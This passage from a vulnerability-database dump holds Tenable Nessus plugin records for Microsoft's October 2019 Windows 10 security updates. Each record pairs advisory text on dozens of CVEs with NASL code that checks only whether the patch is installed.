- A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\");\n # https://support.microsoft.com/en-us/help/4520010/windows-10-update-kb4520010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4f0552f5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4520010.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520010');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520010])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:19:58", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4517389.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1323,\n CVE-2019-1336)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An information disclosure vulnerability exists when\n Windows Update Client fails to properly handle objects\n in memory. An attacker who successfully exploited the\n vulnerability could potentially disclose memory contents\n of an elevated process. (CVE-2019-1337)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4517389.NASL", "href": "https://www.tenable.com/plugins/nessus/129716", "published": "2019-10-08T00:00:00", "title": "KB4517389: Windows 10 Version 1903 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129716);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/15\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1320\",\n \"CVE-2019-1321\",\n \"CVE-2019-1322\",\n \"CVE-2019-1323\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1336\",\n \"CVE-2019-1337\",\n \"CVE-2019-1339\",\n \"CVE-2019-1340\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1345\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1365\",\n \"CVE-2019-1368\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4517389\");\n script_xref(name:\"MSFT\", value:\"MS19-4517389\");\n\n script_name(english:\"KB4517389: Windows 10 Version 1903 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4517389.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1323,\n CVE-2019-1336)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320,\n CVE-2019-1322)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-1060)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass exists when Windows Secure\n Boot improperly restricts access to debugging\n functionality. An attacker who successfully exploited\n this vulnerability could disclose protected kernel\n memory. (CVE-2019-1368)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An information disclosure vulnerability exists when\n Windows Update Client fails to properly handle objects\n in memory. An attacker who successfully exploited the\n vulnerability could potentially disclose memory contents\n of an elevated process. (CVE-2019-1337)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\");\n # https://support.microsoft.com/en-us/help/4517389/windows-10-update-kb4517389\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?13a5b27c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4517389.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4517389');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4517389])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-14T09:20:16", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520009\nor cumulative update 4520002. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully bypass the NTLMv2 protection if a\n client is also sending LMv2 responses. An attacker who\n successfully exploited this vulnerability could gain the\n ability to downgrade NTLM security features.\n (CVE-2019-1338)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1346)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1362, CVE-2019-1364)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function ran by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. An attacker who\n 